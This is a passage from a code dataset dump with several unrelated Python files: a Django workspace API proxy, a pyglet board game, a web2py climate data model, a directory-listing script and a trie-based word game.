datetime, pytz\nimport time\nimport shutil\nimport logging\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.http import require_http_methods\n\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom kubernetes import client, config\n\nlogger = logging.getLogger('apilog')\napp_name = \"\"\nexec_stat = \"\"\nexec_detail = \"\"\n\n@require_http_methods(['POST'])\n@csrf_exempt\ndef post(request):\n try:\n logger.debug(\"CALL workspace post\")\n app_name = \"ワークスペース作成:\"\n exec_stat = \"初期化\"\n exec_detail = \"\"\n\n # ヘッダ情報\n headers = {\n 'Content-Type': 'application/json',\n }\n\n # データ情報\n data = '{}'\n\n # パラメータ情報(JSON形式)\n payload = json.loads(request.body)\n\n # CiCd Api の呼び先設定\n apiInfo = \"{}://{}:{}/\".format(os.environ[\"EPOCH_CICD_PROTOCOL\"], os.environ[\"EPOCH_CICD_HOST\"], os.environ[\"EPOCH_CICD_PORT\"])\n output = []\n\n # post送信(argocd/pod作成)\n exec_stat = \"ArgoCDデプロイ\"\n response = requests.post(apiInfo + 'argocd/pod', headers=headers, data=data, params=payload)\n\n if isJsonFormat(response.text):\n # 取得したJSON結果が正常でない場合、例外を返す\n ret = json.loads(response.text)\n if ret[\"result\"] == \"OK\":\n output.append(ret[\"output\"])\n else:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n else:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"output\": response.text,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response,status=500)\n\n # post送信(ita/pod作成)\n exec_stat = \"Exastro IT Automationデプロイ\"\n response = requests.post(apiInfo + 'ita/', headers=headers, data=data, params=payload)\n\n # 取得したJSON結果が正常でない場合、例外を返す\n ret = json.loads(response.text)\n if ret[\"result\"] == \"OK\":\n output.append(ret[\"output\"])\n else:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n\n response = {\n \"result\": {\n \"code\": \"200\",\n \"detailcode\": \"\",\n \"output\": output,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response)\n\n except Exception as e:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"output\": traceback.format_exc(),\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response,status=500)\n\ndef isJsonFormat(line):\n try:\n json.loads(line)\n except json.JSONDecodeError as e:\n logger.debug(sys.exc_info())\n logger.debug(e)\n return False\n # 以下の例外でも捕まえるので注意\n except ValueError as e:\n logger.debug(sys.exc_info())\n logger.debug(e)\n return False\n except Exception as e:\n logger.debug(sys.exc_info())\n logger.debug(e)\n return False\n return True\n\n# @csrf_exempt\n# def conv(template_yaml, dest_yaml):\n\n# # 実行yamlの保存\n# shutil.copy(template_yaml, dest_yaml)\n\n# # 実行yamlを読み込む\n# with open(dest_yaml, encoding=\"utf-8\") as f:\n# data_lines = f.read()\n\n# epochImage = os.environ['EPOCH_CICD_IMAGE']\n# epochPort = os.environ['EPOCH_CICD_PORT']\n\n# # 文字列置換\n# data_lines = data_lines.replace(\"<__epoch_cicd_api_image__>\", epochImage)\n# data_lines = 
data_lines.replace(\"<__epoch_cicd_api_port__>\", epochPort)\n\n# # 同じファイル名で保存\n# with open(dest_yaml, mode=\"w\", encoding=\"utf-8\") as f:\n# f.write(data_lines)\n\n\n@require_http_methods(['GET','POST'])\n@csrf_exempt\ndef info_all(request):\n \"\"\"ワークスペース情報\n\n Args:\n request ([json]): 画面項目\n\n Returns:\n dict : workspace情報\n \"\"\"\n if request.method == 'POST':\n return info_all_post(request)\n else:\n return info_all_get(request)\n\n@csrf_exempt\ndef info_all_post(request):\n \"\"\"ワークスペース情報(POST)\n\n Args:\n request ([json]): 画面項目\n\n Returns:\n dict : workspace情報\n \"\"\"\n try:\n logger.debug (\"CALL \" + __name__)\n\n app_name = \"ワークスペース情報:\"\n exec_stat = \"初期化\"\n exec_detail = \"\"\n\n # ヘッダ情報\n post_headers = {\n 'Content-Type': 'application/json',\n }\n\n # 引数をJSON形式で受け取りそのまま引数に設定\n post_data = request.body\n\n # 呼び出すapiInfoは、環境変数より取得\n apiInfo = \"{}://{}:{}/\".format(os.environ[\"EPOCH_RS_WORKSPACE_PROTOCOL\"], os.environ[\"EPOCH_RS_WORKSPACE_HOST\"], os.environ[\"EPOCH_RS_WORKSPACE_PORT\"])\n\n # ワークスペース情報保存\n exec_stat = \"保存\"\n request_response = requests.post( apiInfo + \"workspace\", headers=post_headers, data=post_data)\n logger.debug(\"workspace:\" + request_response.text)\n ret = json.loads(request_response.text)\n #print(ret)\n if request_response.status_code == 500:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n \n # 戻り値をそのまま返却 \n return JsonResponse(ret, status=request_response.status_code)\n\n except Exception as e:\n response = {\n \"result\": {\n \"output\": traceback.format_exc(),\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=500)\n\ndef info_all_get(request):\n # sample\n response = {\n \"result\": {\n \"code\": \"200\",\n \"detailcode\": \"\",\n \"output\": \"Hello World. 
(Sample)\",\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response)\n\n@require_http_methods(['GET','PUT'])\n@csrf_exempt\ndef info(request, workspace_id):\n \"\"\"ワークスペース詳細取得(id指定)\n\n Args:\n request (HttpRequest): HTTP request\n workspace_id (int): ワークスペースID\n\n Returns:\n response: HTTP Respose\n \"\"\"\n if request.method == 'PUT':\n return info_put(request, workspace_id)\n else:\n return info_get(request, workspace_id)\n\n@csrf_exempt\ndef info_put(request, workspace_id):\n \"\"\"ワークスペース詳細取得\n\n Args:\n request (HttpRequest): HTTP request\n workspace_id (int): ワークスペースID\n\n Returns:\n response: HTTP Respose\n \"\"\"\n try:\n app_name = \"ワークスペース情報:\"\n exec_stat = \"初期化\"\n exec_detail = \"\"\n\n # ヘッダ情報\n headers = {\n 'Content-Type': 'application/json',\n }\n\n # 引数をJSON形式で受け取りそのまま引数に設定\n post_data = request.body\n\n # PUT送信(更新)\n resourceProtocol = os.environ['EPOCH_RS_WORKSPACE_PROTOCOL']\n resourceHost = os.environ['EPOCH_RS_WORKSPACE_HOST']\n resourcePort = os.environ['EPOCH_RS_WORKSPACE_PORT']\n apiInfo = \"{}://{}:{}/\".format(resourceProtocol, resourceHost, resourcePort)\n request_response = requests.put(apiInfo + 'workspace/' + str(workspace_id), headers=headers, data=post_data)\n ret = json.loads(request_response.text)\n\n if request_response.status_code == 500:\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n raise Exception\n\n # 戻り値をそのまま返却 \n return JsonResponse(ret, status=request_response.status_code)\n\n except Exception as e:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"output\": traceback.format_exc(),\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=500)\n\n@csrf_exempt\ndef info_get(request, workspace_id):\n \"\"\"ワークスペース詳細取得\n\n Args:\n request (HttpRequest): HTTP request\n workspace_id (int): ワークスペースID\n\n Returns:\n response: HTTP Respose\n \"\"\"\n try:\n # ヘッダ情報\n headers = {\n 'Content-Type': 'application/json',\n }\n\n # GET送信(作成)\n resourceProtocol = os.environ['EPOCH_RS_WORKSPACE_PROTOCOL']\n resourceHost = os.environ['EPOCH_RS_WORKSPACE_HOST']\n resourcePort = os.environ['EPOCH_RS_WORKSPACE_PORT']\n apiInfo = \"{}://{}:{}/\".format(resourceProtocol, resourceHost, resourcePort)\n response = requests.get(apiInfo + 'workspace/' + str(workspace_id), headers=headers)\n\n output = []\n if response.status_code == 200 and isJsonFormat(response.text):\n # 取得したJSON結果が正常でない場合、例外を返す\n ret = json.loads(response.text)\n output = ret[\"rows\"]\n elif response.status_code == 404:\n response = {\n \"result\": {\n \"detailcode\": \"\",\n \"output\": response.text,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=404)\n else:\n if response.status_code == 500 and isJsonFormat(response.text):\n # 戻り値がJsonの場合は、値を取得\n ret = json.loads(response.text)\n # 詳細エラーがある場合は詳細を設定\n if ret[\"errorDetail\"] is not None:\n exec_detail = ret[\"errorDetail\"]\n\n response = {\n \"result\": {\n \"detailcode\": \"\",\n \"output\": response.text,\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, 
status=500)\n\n response = {\n \"result\": {\n \"detailcode\": \"\",\n \"output\": output,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=200)\n\n except Exception as e:\n response = {\n \"result\": {\n \"code\": \"500\",\n \"detailcode\": \"\",\n \"output\": traceback.format_exc(),\n \"errorStatement\": app_name + exec_stat,\n \"errorDetail\": exec_detail,\n \"datetime\": datetime.datetime.now(pytz.timezone('Asia/Tokyo')).strftime('%Y/%m/%d %H:%M:%S'),\n }\n }\n return JsonResponse(response, status=500)\n","sub_path":"epochServiceApi/workspace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83896716","text":"\"\"\"\nThe module game is part of RoboProject by Pyladies Brno.\n\nKey library is pyglet Python library https://bitbucket.org/pyglet/pyglet/wiki/Home\nThis module imports the backend and frontend modules.\n\nThe game module\n - imports pyglet library, backend and frontend modules\n - provides arguments for map size\n - loads specific JSON map with 12x12 tiles with the size 64x64 px\n - calls pyglet window\n - calls various backend and frontend functions\n - draws the game map and runs pyglet\n\"\"\"\n\nimport backend\nimport frontend\nimport pyglet\n\n# definition of game board tiles and their size:\nTILE_WIDTH = 64\nTILE_HEIGHT = 64\nWINDOW_WIDTH = 12*TILE_WIDTH\nWINDOW_HEIGHT = 12*TILE_HEIGHT\n\n# loading JSON map data from the backend module\nmap_name = \"./maps/test_3.json\"\ndata = backend.get_data(map_name)\n\n# loading pyglet graphic window from the frontend module\nwindow = frontend.init_window(WINDOW_WIDTH, WINDOW_HEIGHT)\n\n# calling functions from the backend module to draw the game board\ncoordinates = backend.get_coordinates(data)\ntilelist = backend.get_tiles(data)\nstate = backend.get_coordinate_dict(coordinates, tilelist)\n\n# loading pyglet sprites by the frontend module\nimages = frontend.load_images(data, state, TILE_WIDTH, TILE_HEIGHT)\n\n\n@window.event\ndef on_draw():\n \"\"\"\n this function clears the graphic window\n and finally draws the board game\n \"\"\"\n window.clear()\n frontend.draw_board(state, images)\n\n# this runs the pyglet library\npyglet.app.run()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"79396347","text":"# -*- coding: utf-8 -*-\n\n__doc__ = \"\"\"Climate data portal models\n\nClimate data is stored in dynamically created tables.\nThese tables can be added from the command line script add_table.py\nin modules.ClimateDataPortal.\nThe table definitions are stored in climate_sample_table_spec.\n\nA data is an observed value over a time quantum at a given place.\n\ne.g. observed temperature in Kathmandu between Feb 2006 - April 2007\n\nPlaces are currently points, i.e. 
lat/lon coordinates.\nPlaces may be stations.\nPlaces may have elevation or other optional information.\n\n\"\"\"\n\n\nmodule = \"climate\"\n\nif deployment_settings.has_module(\"climate\"):\n climate_first_run_sql = []\n def climate_first_run():\n for sql in climate_first_run_sql:\n db.executesql(sql)\n db.commit()\n\n def climate_define_table(name, fields, attrs = None):\n if attrs is None:\n attrs = {}\n return db.define_table(\n \"climate_\"+name,\n *fields,\n **attrs\n )\n\n # @ToDo: would be great if we had a table that could represent\n # places. gis_location doesn't fit the bill as there are so many\n # other fields that climate doesn't use.\n # elevation is not included as it would just mean a performance hit\n # when we are generating 2D maps without elevation info.\n climate_place = climate_define_table(\n \"place\",\n (\n # @ToDo: change into GIS point\n Field(\n \"longitude\",\n \"double\",\n notnull=True,\n required=True,\n ),\n Field(\n \"latitude\",\n \"double\",\n notnull=True,\n required=True,\n )\n )\n )\n\n def place_attribute_table(\n attribute_table_name,\n fields\n ):\n return climate_define_table(\n \"place_\"+attribute_table_name,\n fields\n )\n\n # elevation may not be useful for future projects\n # e.g. where not available, or sea-based stations\n # also, elevation may be supplied for gridded data\n climate_elevation = place_attribute_table(\n \"elevation\",\n (\n Field(\n \"elevation_metres\",\n \"double\",\n notnull=True,\n required=True,\n ),\n )\n )\n\n # not all places are stations with elevations\n # as in the case of \"gridded\" data\n # a station can only be in one place\n climate_station_name = place_attribute_table(\n \"station_name\",\n (\n Field(\n \"name\",\n \"string\",\n notnull=True,\n required=True,\n ),\n )\n )\n\n # station id may not be useful or even meaningful\n # e.g. 
gridded data has no stations.\n # this is passive data so ok to store separately\n climate_station_id = place_attribute_table(\n \"station_id\",\n (\n Field(\n \"station_id\",\n \"integer\",\n notnull=True,\n required=True,\n ),\n )\n )\n\n def station_represent(id):\n row_id = db(climate_station_id.station_id == id).select(\n climate_station_id.station_id,\n limitby=(0,1)\n ).first()\n row_name = db(climate_station_name.id == id).select(\n climate_station_name.name,\n limitby=(0,1)\n ).first()\n \n if row_id and row_id.station_id:\n represent = \" (%s)\" % row_id.station_id\n else:\n represent = \"\"\n if row_name and row_name.name:\n represent = \"%s%s\" % (row_name.name, represent)\n \n return represent or NONE\n \n \n station_id = S3ReusableField(\n \"station_id\", \n climate_station_name, \n sortby=\"name\",\n requires = IS_ONE_OF(\n db,\n \"climate_place_station_name.id\",\n station_represent,\n orderby=\"climate_place_station_name.name\",\n sort=True\n ),\n represent = station_represent,\n label = \"Station\",\n ondelete = \"RESTRICT\"\n )\n\n # coefficient of variance is meaningless for degrees C but Ok for Kelvin\n # internally all scales must be ratio scales if coefficient \n # of variations is to be allowed, (which it is)\n # rainfall (mm), temp (K) are ok\n # output units \n \n climate_sample_table_spec = climate_define_table(\n \"sample_table_spec\",\n (\n Field(\n \"name\",\n \"string\",\n notnull=True,\n required=True,\n ),\n Field(\n \"sample_type_code\",\n \"string\",\n length = 1,\n notnull = True,\n # web2py requires a default value for not null fields\n default = \"\",\n required = True\n ),\n Field(\n \"field_type\",\n \"string\",\n notnull=True,\n required=True,\n ),\n Field(\n \"units\",\n \"string\",\n notnull=True,\n required=True,\n ),\n Field(\n \"date_mapping\",\n \"string\",\n default=\"\",\n notnull=True,\n required=True\n ),\n Field(\n \"grid_size\",\n \"double\",\n default = 0,\n notnull = True,\n required = True\n )\n ),\n )\n \n def sample_table_spec_represent(id):\n table = db.climate_sample_table_spec\n row = db(table.id == id).select(\n table.name,\n table.sample_type_code,\n limitby=(0, 1)\n ).first()\n if row:\n return \"%s %s\" % (\n ClimateDataPortal.sample_table_types_by_code[row.sample_type_code].__name__, \n row.name\n )\n else:\n return NONE\n \n parameter_id = S3ReusableField(\n \"parameter_id\", \n db.climate_sample_table_spec, \n sortby=\"name\",\n requires = IS_ONE_OF(\n db,\n \"climate_sample_table_spec.id\",\n sample_table_spec_represent,\n sort=True\n ),\n represent = sample_table_spec_represent,\n label = \"Parameter\",\n# script = SCRIPT(\n#\"\"\"\n#S3FilterFieldChange({\n# 'FilterField': 'sample_type_code',\n# 'Field': 'parameter_id',\n# 'FieldResource':'sample_table_spec',\n# 'FieldPrefix': 'climate',\n#});\"\"\"),\n ondelete = \"RESTRICT\"\n )\n\n climate_first_run_sql.append(\n \"ALTER TABLE climate_sample_table_spec\"\n \" ADD CONSTRAINT climate_sample_table_name_sample_type_unique\"\n \" UNIQUE (name, sample_type_code);\"\n )\n\n climate_monthly_aggregation_table_spec = climate_define_table(\n \"monthly_aggregation\",\n (\n Field(\n \"sample_table_id\",\n climate_sample_table_spec,\n notnull = True,\n required = True\n ),\n Field(\n # this maps to the name of a python class\n # that deals with the monthly aggregated data.\n \"aggregation\",\n \"string\",\n notnull=True,\n required=True,\n )\n )\n )\n\n # =====================================================================\n # Station Parameters\n #\n resourcename = 
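represent callables like station_represent above turn a stored id into display text and fall back to NONE; the same shape without web2py, with stub values standing in for the two select().first() row lookups:

NONE = "-"

def represent(station_id, station_name):
    # station_id / station_name stand in for the two database row results.
    text = f" ({station_id})" if station_id else ""
    if station_name:
        text = f"{station_name}{text}"
    return text or NONE

print(represent(1407, "Kathmandu Airport"))   # Kathmandu Airport (1407)
print(represent(None, None))                  # -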
\"station_parameter\"\n tablename = \"climate_station_parameter\"\n table = db.define_table(\n tablename,\n station_id(),\n parameter_id(\n requires = IS_ONE_OF(\n db,\n \"climate_sample_table_spec.id\",\n sample_table_spec_represent,\n sort=True\n ),\n script = None\n ),\n )\n \n # Add virtual fields for range: from - to\n \n \n\n # CRUD strings\n ADD_STATION_PARAMETER = T(\"Add Station Parameter\")\n LIST_STATION_PARAMETER = T(\"List Station Parameters\")\n s3.crud_strings[tablename] = Storage(\n title_create = ADD_STATION_PARAMETER,\n title_display = T(\"Station Parameter Details\"),\n title_list = LIST_STATION_PARAMETER,\n title_update = T(\"Edit Station Parameter\"),\n title_search = T(\"Search Station Parameters\"),\n subtitle_create = ADD_STATION_PARAMETER,\n subtitle_list = T(\"Station Parameters\"),\n label_list_button = LIST_STATION_PARAMETER,\n label_create_button = ADD_STATION_PARAMETER,\n label_delete_button = T(\"Remove Station Parameter\"),\n msg_record_created = T(\"Station Parameter Added\"),\n msg_record_modified = T(\"Station Parameter updated\"),\n msg_record_deleted = T(\"Station Parameter removed\"),\n msg_list_empty = T(\"No Station Parameters currently registered\")\n )\n \n\n # Virtual Field for pack_quantity\n class station_parameters_virtualfields(dict, object):\n def range_from(self):\n query = (\n \"SELECT MIN(time_period) \"\n \"from climate_sample_table_%(parameter_id)i \"\n \"WHERE place_id = %(station_id)i;\"\n ) % dict(\n parameter_id = self.climate_station_parameter.parameter_id,\n station_id = self.climate_station_parameter.station_id,\n )\n date = db.executesql(query)[0][0]\n if date is not None:\n year,month = ClimateDataPortal.month_number_to_year_month(date)\n return \"%s-%s\" % (month, year)\n else:\n return NONE\n \n \n \n #\"Now station_id=%s parameter_id=%s\" % (\n # self.climate_station_parameter.station_id,\n # self.climate_station_parameter.parameter_id)\n def range_to(self):\n query = (\n \"SELECT MAX(time_period) \"\n \"from climate_sample_table_%(parameter_id)i \"\n \"WHERE place_id = %(station_id)i;\"\n ) % dict(\n parameter_id = self.climate_station_parameter.parameter_id,\n station_id = self.climate_station_parameter.station_id,\n )\n date = db.executesql(query)[0][0]\n if date is not None:\n year,month = ClimateDataPortal.month_number_to_year_month(date)\n return \"%s-%s\" % (month, year)\n else:\n return NONE\n \n table.virtualfields.append(station_parameters_virtualfields())\n \n s3mgr.configure(\n tablename,\n insertable = False,\n list_fields = [\n \"station_id\",\n \"parameter_id\",\n (T(\"Range From\"), \"range_from\"),\n (T(\"Range To\"), \"range_to\"),\n ]\n )\n \n # Load all stations and parameters\n if not db(table.id > 0).count():\n station_rows = db(\n climate_station_name.id > 0\n ).select(\n climate_station_name.id\n )\n for station_row in station_rows:\n parameter_rows = db(\n climate_sample_table_spec.sample_type_code == \"O\"\n ).select(climate_sample_table_spec.id)\n for parameter_row in parameter_rows:\n table.insert(\n station_id = station_row.id,\n parameter_id = parameter_row.id\n )\n \n \n # =====================================================================\n # Purchase Data\n #\n nationality_opts = {1:\"Nepali\", 2:\"Foreigner\"}\n \n resourcename = \"purchase\"\n tablename = \"climate_purchase\"\n table = db.define_table(\n tablename,\n #user_id(),\n #Field(\"sample_type_code\",\n # \"string\",\n # requires = IS_IN_SET(sample_type_code_opts),\n # represent = lambda code: 
ClimateDataPortal.sample_table_types_by_code[code]\n #),\n parameter_id(\n requires = IS_ONE_OF(\n db,\n \"climate_sample_table_spec.id\",\n sample_table_spec_represent,\n filterby = \"sample_type_code\",\n filter_opts = [\"O\"],\n sort=True\n ),\n ),\n station_id(),\n Field(\"date_from\",\n \"date\",\n requires = IS_DATE(format = s3_date_format),\n widget = S3DateWidget(),\n default = request.utcnow,\n required = True\n ),\n Field(\"date_to\",\n \"date\",\n requires = IS_DATE(format = s3_date_format),\n widget = S3DateWidget(),\n default = request.utcnow,\n required = True\n ),\n Field(\"nationality\",\n \"integer\",\n label = T(\"Nationality\"),\n requires = IS_IN_SET(nationality_opts),\n represent = lambda id: nationality_opts.get(id, NONE),\n required = True\n ),\n Field(\"purpose\",\n \"text\"\n ),\n Field(\"price\", \n \"string\",\n ),\n Field(\"paid\",\n \"boolean\",\n represent = lambda paid: paid and \"Yes\" or \"No\",\n ),\n *s3_meta_fields()\n )\n \n if not s3_has_role(ADMIN):\n db.climate_purchase.paid.writeable = False\n \n # CRUD strings\n ADD_CLIMATE_PURCHASE = T(\"Purchase New Data\")\n LIST_CLIMATE_PURCHASE = T(\"All Purchased Data\")\n s3.crud_strings[tablename] = Storage(\n title_create = ADD_CLIMATE_PURCHASE,\n title_display = T(\"Purchased Data Details\"),\n title_list = LIST_CLIMATE_PURCHASE,\n title_update = T(\"Edit Purchased Data Details\"),\n title_search = T(\"Search Purchased Data\"),\n subtitle_create = ADD_CLIMATE_PURCHASE,\n subtitle_list = T(\"Purchased Data\"),\n label_list_button = LIST_CLIMATE_PURCHASE,\n label_create_button = ADD_CLIMATE_PURCHASE,\n label_delete_button = T(\"Remove Purchased Data\"),\n msg_record_created = T(\"Data Purchase In Process\"),\n msg_record_modified = T(\"Data Purchase Processed\"),\n msg_record_deleted = T(\"Data Purchase removed\"),\n msg_list_empty = T(\"No Data Purchased\"))\n \n def climate_purchase_onaccept(form):\n # Calculate Price\n id = form.vars.id\n \n parameter_table = db(\n db.climate_sample_table_spec.id == form.vars.parameter_id\n ).select(\n db.climate_sample_table_spec.id,\n db.climate_sample_table_spec.date_mapping\n ).first()\n parameter_table_id = parameter_table.id\n date_mapping_name = parameter_table.date_mapping\n period = date_mapping_name\n \n date_from = form.vars.date_from\n date_to = form.vars.date_to\n nationality = int(form.vars.nationality)\n if nationality == 1:\n period_dict = dict(\n daily = 60,\n monthly = 40\n # 3:15,\n # 4:5\n )\n currency = \"NRs\"\n else:\n period_dict = dict(\n daily = 2,\n monthly = 1.5\n # 3:0.5,\n # 4:0.25}\n )\n currency = \"US$\"\n \n date_mapping = getattr(ClimateDataPortal, date_mapping_name)\n \n start_date_number = date_mapping.date_to_time_period(date_from)\n end_date_number = date_mapping.date_to_time_period(date_to)\n \n place_id = int(form.vars.station_id)\n \n duration = db.executesql(\n \"SELECT COUNT(*) \"\n \"FROM climate_sample_table_%(parameter_table_id)i \"\n \"WHERE time_period >= %(start_date_number)i \"\n \"AND place_id = %(place_id)i \"\n \"AND time_period <= %(end_date_number)i;\" % locals()\n )[0][0]\n price = \"%.2f\" % (duration * period_dict[period] / (dict(daily=365.25, monthly=12)[period]))\n db.climate_purchase[id] = {\"price\": \"%s %s\" % (price, currency)}\n\n s3mgr.configure(\n tablename,\n onaccept = climate_purchase_onaccept,\n create_next = aURL( args = [\"[id]\",\"read\"]),\n #listadd = listadd\n )\n \n # =====================================================================\n # Saved Queries\n #\n resourcename = \"save_query\"\n 
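# resource and table names follow the <module>_<resourcename> convention used for the other tables in this model\n    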
tablename = \"climate_save_query\"\n table = db.define_table(\n tablename,\n #user_id(),\n Field(\"description\", \"string\"),\n Field(\"query_definition\", \"text\"),\n )\n\n # CRUD strings\n ADD_SAVE_QUERY = T(\"Save Query\")\n LIST_SAVE_QUERY = T(\"Saved Queries\")\n s3.crud_strings[tablename] = Storage(\n title_create = ADD_SAVE_QUERY,\n title_display = T(\"Saved Query Details\"),\n title_list = LIST_SAVE_QUERY,\n title_update = T(\"Edit Saved Query\"),\n title_search = T(\"Search Saved Queries\"),\n subtitle_create = ADD_SAVE_QUERY,\n subtitle_list = T(\"Saved Queries\"),\n label_list_button = LIST_SAVE_QUERY,\n label_create_button = ADD_SAVE_QUERY,\n label_delete_button = T(\"Remove Saved Query\"),\n msg_record_created = T(\"Query Saved\"),\n msg_record_modified = T(\"Saved Query updated\"),\n msg_record_deleted = T(\"Saved Query removed\"),\n msg_list_empty = T(\"No Queries Saved\"))\n \n s3mgr.configure(\n tablename,\n listadd = False\n )\n \n # =====================================================================\n","sub_path":"models/climate.py","file_name":"climate.py","file_ext":"py","file_size_in_byte":17812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436400205","text":"import os\r\nimport shutil\r\n\r\n# print(os.name)\r\n# print()\r\n#\r\n# print(os.environ)\r\n# print()\r\n#\r\n# print(os.environ.get(\"JAVA_HOME\"))\r\n# print()\r\n#\r\n# print(os.path.abspath('.'))\r\n# print()\r\n\r\n# os.mkdir(\"zym\")\r\n# input(\"input: \")\r\n# os.rmdir(\"zym\")\r\n\r\nfor x in os.listdir('.'):\r\n # if os.path.isfile(x) and os.path.splitext(x)[1] == '.py':\r\n if os.path.isfile(x):\r\n print('file: ' + os.path.abspath(x))\r\n if os.path.isdir(x):\r\n print('path: ' + x)\r\n","sub_path":"PycharmProjects/learning/file_dir.py","file_name":"file_dir.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"600985219","text":"from trie import trie\nimport pickle\nimport sys\nimport numpy as np\nimport time\nimport os\nimport dict\n\ndef win_title(title):\n if os.name == 'posix':\n print(f'\\33]0;{title}\\a', end='', flush=True)\n else:\n os.system(f\"title {title}\")\n\ndef clrscr():\n if os.name == 'posix':\n os.system(\"clear\")\n else:\n os.system('cls')\n\ndef load_model(file_name):\n obj_file = open(file_name, 'rb')\n tree = trie()\n tree = pickle.load(obj_file)\n return tree\n\n\nclass player(object):\n \n def __init__(self, vocab_tree):\n self.vocab_tree = vocab_tree\n self.current_node = self.vocab_tree.root\n self.score = 0\n \n def reset(self):\n self.current_node = self.vocab_tree.root\n\n def play(self, word):\n \n if(len(word)==0):\n self.current_node = np.random.choice(self.current_node.children)\n return word + self.current_node.val\n last_char = word[-1]\n if(last_char in [child.val for child in self.current_node.children]):\n self.current_node = [child for child in self.current_node.children if child.val == last_char][0]\n if len(self.current_node.children) == 0 or self.current_node.isend:\n self.stop()\n else:\n self.current_node = np.random.choice(self.current_node.children) \n print(\"Move : \", self.current_node.val)\n word = word + self.current_node.val\n else:\n self.get_show(word)\n return word\n\n def show(self, pref):\n self.vocab_tree.words_with(pref)\n \n\n def get_show(self, word):\n global done, user_score\n print(\"Show\")\n word_ = input(\"~> \")\n if not word in word_ or len(word_) < 4 :\n print(f\"What? 
We're talking about something that starts with {word.upper()}, of length greater than or equal to 4.\")\n            self.get_show(word)\n            return\n        elif dict.check(word_):\n            print(\"You're right; didn't think of that one :) \")\n            self.score -= 1\n            self.vocab_tree.add(word_)\n        else:\n            print(\"I knew you were bluffing ;) \")\n            user_score -= 1\n            done = True\n\n    def stop_response(self, word):\n        global user_score\n        if not(dict.check(word)) or len(word) < 4:\n            print(\"Nope. Real words with length >= 4 only.\")\n            user_score -= 1\n            return\n        self.vocab_tree.add(word)\n        self.score -= 1\n\n    def stop(self):\n        global done, user_score\n        print(\"STOP\\n \")\n        user_score -= 1\n        done = True\n    \n    \ndef main(bot):\n    global done, user_score, bored\n    done = False\n    word = \"\"\n    bot.reset()\n    while not done:\n        \n        print(word)\n        ch = (input('>> '))\n        if ch.lower() == 'stop':\n            bot.stop_response(word)\n            done = True\n            break\n        elif ch.lower() == 'exit()':\n            bored = False\n            break\n        elif ch.lower() == 'show':\n            if len(word):\n                bot.show(word)\n                user_score -= 1\n                done = True\n                break\n            else:\n                print(\"At least make a move.\")\n                continue\n        elif len(ch) != 1 and len(word)>0:\n            print(\"Invalid command\\n\")\n            continue\n        word = word + ch.lower()\n        word = bot.play(word)\n    if bored:\n        input(\"Enter any char to continue\\n\")\n    return bot\n    \nif __name__ == \"__main__\":\n\n    win_title(\"Wyrd\")\n    user_score = 0\n    bot = player(load_model('Resources/player_vocab.pickle'))\n    bored = True\n    while bored:\n        clrscr()\n        print(\"WORD BUILDING\")\n        print(f\"Your Score : {user_score} || Bot's score : {bot.score}\")\n        bot = main(bot)\n    obj_file = open(\"Resources/player_vocab.pickle\", 'wb')\n    pickle.dump(bot.vocab_tree, obj_file)\n    obj_file.close()\n","sub_path":"wyrd.py","file_name":"wyrd.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
